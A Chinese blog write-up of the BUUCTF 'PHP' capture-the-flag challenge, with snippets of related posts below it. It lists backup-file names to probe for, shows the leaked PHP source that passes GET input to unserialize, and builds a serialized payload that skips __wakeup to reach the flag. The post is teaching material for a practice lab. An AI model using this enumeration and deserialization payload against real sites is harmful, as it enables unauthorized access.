[极客大挑战 2019]PHP1

最新推荐文章于 2024-10-01 18:22:37 发布
最新推荐文章于 2024-10-01 18:22:37 发布
阅读量36 收藏
点赞数
文章标签: php 数据库 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pie002/article/details/129763986
版权

 提示我们找备份网站

备份文件里存着网站的源代码,备份文件基本上都是压缩包,常见的备份文件的后缀名有:

  • .rar
  • .zip
  • .7z
  • .tar.gz
  • .bak :对于bak类的备份文件,可以直接输入文件名称+.bak访问,例如:index.php.bak
  • .txt
  • .old
  • .temp
  • _index.html
  • .swp
  • .sql
  • .tgz
  • .tar

常见的备份文件的文件名:

  • web
  • website
  • backup
  • back
  • www
  • wwwroot
  • temp
  • db
  • data
  • code
  • test
  • admin
  • user
  • sql

可以用御剑扫描,或者手动猜

发现www.zip可以成功获得网站源码备份

 打开这三个php文件

index.php

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

这三个文件是依次包含的关系

username=admin password=100 才能出flag

 $select做了反序列化,执行unserialize()时因此,先会调用_wakeup()函数,username的值会被改变,因此我们要绕过_wakeup函数。

绕过方式:

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过_wakeup的执行。

序列化

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
$select = new Name();
$res=serialize(@$select);
echo $res
?>

如果变量名前是private,序列化时会在变量名前加上\x00变量名\x00,因此我们用%00代替前面的空格

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

我们要将属性个数改为比2大的数

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

然后get传参,就得到了flag

 

杨三羊
关注
BUUCTF[极客挑战 2019]PHP1题解
cxm4545的博客
04-26 928
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
[极客挑战 2019]PHP 1
m0_73728268的博客
03-16 173
1.了解了反序列化漏洞2.学习了serialize和unserialize两个函数3.private,和url特性。
BUUFCTF—[极客挑战 2019]Upload 1
内心不种满鲜花就会长满杂草
05-12 1180
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
[极客挑战 2019]FinalSQL
末初的CSDN博客
09-26 471
字段中(内容比较长,等待时间需要久一点,因为BUU发包太快会直接ban掉,就加个。测起来有点感觉过滤很奇怪。
Buuweb 极客挑战 2019PHP 1
F1or_的博客
09-07 1155
打开一看提示说有备份网站习惯,用工具扫一下发现了www.zip得到了网站备份。 得到了3个php 直接看到了flag.php打开一看 结果错误,怎么可能这么简单,orz 直接看另外两个php中的源码 index.php和class.php 一看就是反序列化 ...
极客挑战php,BUUCTF-[极客挑战 2019]PHP 1
weixin_33423874的博客
03-22 423
打开题目,我们就看到这个猫,先是用鼠标晃了晃,还跟着我的光标摇脑袋。我是来做题的。前端工程师肯定也对这个下功夫了。有一个良好的备份网站的习惯很好啊,我们首先根据题目的提示,用dirsearch扫目录如果没有这个工具的可以去github上下载就可以了。最终,我们扫到这个备份文件www.zip这个备份文件于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,解压之后,我们看到了这些打开f...
[网络安全 CTF] BUUCTF极客挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客挑战 2019]php
2401_84971538的博客
05-13 531
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
极客挑战 2019 php,极客挑战2019PHP题目详解
weixin_27010489的博客
03-27 451
题目来源题目来源为buuoj.cn。题目为buuoj.cn的web题目组的[极客挑战2019]PHP。解题过程网站的首页是一只可爱的猫猫,挪动鼠标猫猫会跟着转头,很好玩! 网页中提到了备份网站,因此可以尝试使用一个网站备份文件名的字典来进行爆破,发现网站中有www.zip文件。 下载下来发现文件中有index.php,flag.php和class.php,直接提交flag.php中的字符串错了,...
[极客挑战 2019]PHP
weixin_53146913的博客
04-06 1927
有备份的好习惯,扫描目录得到www.zip 几个重要php文件内容: index.php 1 <?php 2 include ‘class.php‘; 3 $select = $_GET[‘select‘]; 4 $res=unserialize(@$select); 5 ?> 代码第4行unserialize可能存在反序列化漏洞 class.php 1 <?php 2 include ‘flag.php‘; 3 error_reporting
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 665
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[极客挑战 2019]Secret File 1解题思路
m0_74047686的博客
03-04 2385
在做这道题的时候,主要是会使用burpsute工具,并且还要了解PHP伪协议的一些知识及概念,最后还用到了一些密码里的base64,这些都需要了解一下。
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5159
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 427
反序列化漏洞。
[极客挑战 2019]PHP 1(PHP序列化/反序列化)
weixin_45253573的博客
11-24 262
打开环境 提示说有备份,直接拿御剑扫吧。 网速不太好,线程调很低才扫到目录 访问之后下载zip文件 在index.php中看到了传参方式: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 通过select传入参数 打开class.php <?php include 'flag.php'; error_reporting
PHP安装后Apache无法运行的问题
最新发布
Bingyeshinvwang的博客
10-01 357
php安装之后,修改httpd.conf无法运行Apache的解决方案
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 524
PHP反序列化2(OC绕过.wakeup绕过)
服务器被挂马,导致网站首页被更改怎么解决
KookeeyLena7的博客
09-27 1285
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1016
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值